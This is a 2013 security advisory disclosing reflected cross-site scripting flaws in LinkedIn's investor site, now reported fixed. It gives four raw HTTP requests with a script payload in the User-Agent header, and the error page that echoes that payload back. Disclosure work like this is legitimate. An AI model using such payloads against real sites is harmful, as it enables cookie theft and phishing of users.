2013-006: Multiple Reflected XSS vulnerabilities in LinkedIn Investors

Original release date: 4th March 2013
Last revised: 25th March 2013
Discovered by: Eduardo García Melia
Severity: 4.3/10 (CVSS Base Scored)

BACKGROUND

LinkedIn is a social networking service and website (http://www.linkedin.com/) operates the world's largest professional network on the Internet with more than 187 million members in over 200 countries and territories.

More Information: http://press.linkedin.com/about

DESCRIPTION

LinkedIn Investors is affected by Multiple reflected Cross-Site Scripting vulnerabilities. An attacker can inject HTML or script code in the context of victim's browser, so can perform XSS attacks, and steal cookies of a targeted user.

The affected resource is:
http://investors.linkedin.com

PROOF OF CONCEPT 

The XSS vulnerability its in User-Agent:

===============
First XSS
===============
    GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
    Host: investors.linkedin.com
    Proxy-Connection: keep-alive
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    User-Agent: <script>alert("XSS")</script>
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
    Content-Length: 2

===============
Second XSS
===============
    GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
    Host: investors.linkedin.com
    Proxy-Connection: keep-alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    User-Agent: <script>alert("XSS")</script>
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
    Content-Length: 2

===============
Third XSS
===============    
    GET /stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'-- HTTP/1.1
    Host: investors.linkedin.com
    Proxy-Connection: keep-alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    User-Agent: <script>alert("XSS")</script>
    Referer: http://investors.linkedin.com/stocklookup.cfm
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
    Content-Length: 2

===============
Fourth XSS
===============    
    GET /calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate HTTP/1.1
    Host: investors.linkedin.com
    Proxy-Connection: keep-alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    User-Agent: <script>alert("XSS")</script>
    Referer: http://investors.linkedin.com/calculator.cfm
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
    Content-Length: 2

RESPONSE in all cases:

        HTTP/1.1 500 Internal Server Error
    Connection: close
    Date: Mon, 04 Mar 2013 11:34:48 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    server-error: true
    Content-Type: text/html; charset=UTF-8

Error occurred processing request

Error Diagnostic

<cfoutput> Element RESULT.TITLE is undefined in RELEASEDETAIL.
The error occurred on line 175. Date/Time: Mon Mar 04 06:34:48 EST 2013
Browser: <script>alert("XSS")</script>
Remote Address: 192.168.149.88
</cfoutput>

BUSINESS IMPACT

This flaw can be used by a malicious user to send phishing to the linked in customers, abusing of the users trust on LinkedIn portal, tricking the user. This user can be forward to a LinkedIn clone site to stolen credentials, to some malicious site hosting malware and more.

SYSTEMS AFFECTED

The vulnerability affects the LinkedIn Investors: http://investors.linkedin.com

SOLUTION

Corrected by vendor.

REVISION HISTORY

March 04, 2013: Initial release
March 10, 2013: Second release

DISCLOSURE TIMELINE

  • March 04, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • March 10, 2013: Sent to Sec Team.
  • March 25, 2013: Request for update. Response regarding it was already corrected. Sent to lists.

REFERENCES

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.